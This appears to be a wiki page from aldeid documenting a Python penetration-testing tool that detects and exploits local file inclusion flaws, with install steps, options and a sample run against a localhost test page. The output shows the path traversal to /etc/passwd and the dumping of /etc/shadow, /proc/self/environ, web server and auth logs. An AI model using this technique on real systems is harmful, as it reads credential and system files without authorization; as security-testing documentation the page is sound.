From aldeid
Jump to: navigation, search


Simple Local File Inclusion Exploiter is a Python script that enables to identify if a page is vulnerable to Local File Inclusions (LFI) attacks.


$ mkdir -p /pentest/web/lfi-sploiter/
$ cd /pentest/web/lfi-sploiter/
$ wget
$ mv



$ python \
--exploit-url="<http://url>" \


Both options are mandatory:

URL to exploit (e.g. --exploit-url="")
Name of the parameter to exploit (e.g. --vulnerable-parameter="page")


The following example is a proof of concept tested against a vulnerable specific code, that you can download here.

$ python --exploit-url="http://localhost/poc/LFI/index.php?page=1" \

Simple Local File Inclusion Exploiter
by Valentin Hoebel (valentin ( a t ) xenuser ( d o t ) org)

Version 1.0 (21th November 2010)  ^__^
                                  (__)\        )\/\ 
                                      ||----w |
Power to teh cows!                    ||     ||

[i] Provided URL to exploit: http://localhost/poc/LFI/index.php?page=1
[i] Provided vulnerable parameter: page

[i] Assuming the provided data was correct.
[i] Trying to establish a connection with a random user agent...
[i] Connected to target! URL seems to be valid.
[i] Jumping to the exploit feature.

[i] For exploiting the LFI vulnerability we need to split the URL into its parts.
[i] IP address / domain: localhost
[i] Script: /poc/LFI/index.php
[i] URL query string: page=1

[i] It seems that the URL contains at least one parameter.
[i] Trying to find also other parameters...
[i] No other parameters were found.
[i] The following 1 parameter(s) was/were found:
[i] {'page': '1'}

[i] According to you, the vulnerable parameter should be: page
[i] Checking if this parameter exists in the provided URL...
[i] Found your vulnerable parameter in the URL.

[i] Now trying to find out how this LFI vulnerability can be exploited...
[i] This can take a while.
[+] Found signs of a successfull LFI vulnerability! No nullbyte was required.
[+] URL: http://localhost/poc/LFI/index.php?page=/etc/passwd

[i] Exploiting the LFI vulnerability starts right now.
[i] Trying to dump some interesting files to your local hard disk...
[+] Dumping file: /etc/passwd
[+] Dumping file: /proc/self/environ
[+] Dumping file: /var/log/apache2/access.log
[+] Dumping file: /var/log/apache2/error.log
[+] Dumping file: /etc/shadow
[+] Dumping file: /etc/group
[+] Dumping file: /var/log/auth.log
[+] Dumping file: /proc/self/status
[+] Dumping file: /proc/self/mounts
[+] Dumping file: /proc/cpuinfo
[+] Dumping file: /proc/meminfo
[i] Hint: The files are also dumped when we have no permission to view them.
[i] Instead of the file, the PHP error message will be dumped.

[i] Completed the task. Will now exit!
[i] I know, there is more about LFI than it is covered here, but this will be implemented in later versions of this tool.
[i] Feel free to send in some feedback!